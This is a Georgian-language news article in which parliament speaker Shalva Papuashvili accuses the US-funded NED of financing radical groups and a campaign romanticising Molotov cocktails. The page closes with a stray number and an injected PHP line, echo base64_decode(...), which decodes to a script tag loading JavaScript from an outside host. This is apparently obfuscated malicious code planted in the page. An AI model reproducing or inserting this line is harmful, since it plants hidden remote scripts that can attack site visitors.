celsiusi
ავერსი საქკაბელი

 პასუხი უნდა გაეცეს, როგორ ფინანსდება საქართველოში რადიკალური ჯგუფები, როგორ ფინანსდება „მოლოტოვის კოქტეილის“ რომანტიზება ამერიკელი ხალხის ფულით, – ამის შესახებ პარლამენტის თავმჯდომარემ, შალვა პაპუაშვილმა საქართველოს პირველი არხის გადაცემაში „აქტუალური თემა – მაკა ცინცაძესთან ერთად“ სტუმრობისას განაცხადა.

პაპუაშვილის თქმით, ეს არ არის კეთილსინდისიერი ქცევა.

„კამპანია „მე ვისროლე“ დაფინანსებული არის ამერიკის ბიუჯეტიდან, რომელსაც ამტკიცებს კონგრესი. ამიტომ, ვფიქრობ, კითხვები ჩვენ კი არ უნდა დაგვისვან, არამედ კითხვები უნდა დაუსვან NED-ს და მოიკითხონ, ამერიკის გადასახადის გადამხდელების, ამერიკის მოქალაქეების ფული რატომ მიედინება უცხო ქვეყანაში „მოლოტოვის კოქტეილის“ იდეის პოპულარიზაციისკენ. ვფიქრობ, ეს უფრო სწორი საქციელი იქნებოდა. იქნებ დაინტერესდნენ, რატომ და როგორ აფინანსებენ ამერიკული ფონდებიდან საქართველოში პარტიებს, რადიკალურ და ექსტრემისტულ ჯგუფებს? არის თუ არა ეს ამერიკელი ხალხის ინტერესებში? უპირველეს ყოვლისა, ამერიკელი ხალხის ინტერესებს ეწინააღმდეგება, როცა სტრატეგიულ პარტნიორ ქვეყანაში, რომელიც შენს ჯარისკაცებთან ერთად მხარდამხარ იდგა ავღანეთში – და ჩვენ დავკარგეთ უფრო მეტი ჯარისკაცი ავღანეთში, ვიდრე ევროკავშირის ბევრ ქვეყანას საერთოდ იქ ჯარისკაცი ჰყავდა – შენი ბიუჯეტიდან რომელიღაც ორგანიზაცია „მოლოტოვის კოქტეილის“ რომანტიზებაში ხარჯავს ფულს. არის თუ არა ეს კეთილსინდისიერი საქციელი? რა თქმა უნდა, ეს არ არის კეთილსინდისიერი ქცევა და ამაზე ჩვენ გვინდა პასუხები, ეს არ არის ჩავლილი საკითხი. პასუხი უნდა გაეცეს, როგორ ფინანსდებიან საქართველოში რადიკალური ჯგუფები, როგორ ფინანსდება „მოლოტოვის კოქტეილის“ რომანტიზება ამერიკელი ხალხის ფულით.

დღეს ვნახე NED-ის ხელმძღვანელობის გამოხმაურება, როგორ არ მიესალმება გამჭვირვალობის შესახებ კანონპროექტს და ამბობს, თითქოს მათი დაფინანსება მხოლოდ ქართველი ხალხის ინტერესებისთვის არის. პლაკატი – მე ვესროლე, არის ორგანიზაცია „სირცხვილიას“ მიერ წარმოებული კამპანიის ნაწილი. „მოლოტოვის კოქტეილი“ შარშან, საქართველოს დამოუკიდებლობის ისტორიაში პირველად ესროლეს ქართველ ხალხს და ცოცხლად წვავდნენ პოლიციელს. ორგანიზაცია „სირცხვილია“, „ნაციონალური მოძრაობის“ ახალგაზრდულ ფრთასთან ერთად, არის რადიკალური ჯგუფი და მას ჰქონდა კამპანია – მე ვესროლე. აი, ეს კამპანია ფინანსდებოდა ამერიკელი და ევროპელი მოქალაქეების ფულით. იმას, ვინც ამას აფინანსებს, რამე კარგი უნდა ქართველი ხალხისთვის? არ უნდა გვითხრას, რას აფინანსებს და რისთვის ამ ქვეყანაში?“ – განაცხადა პაპუაშვილმა.

115
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");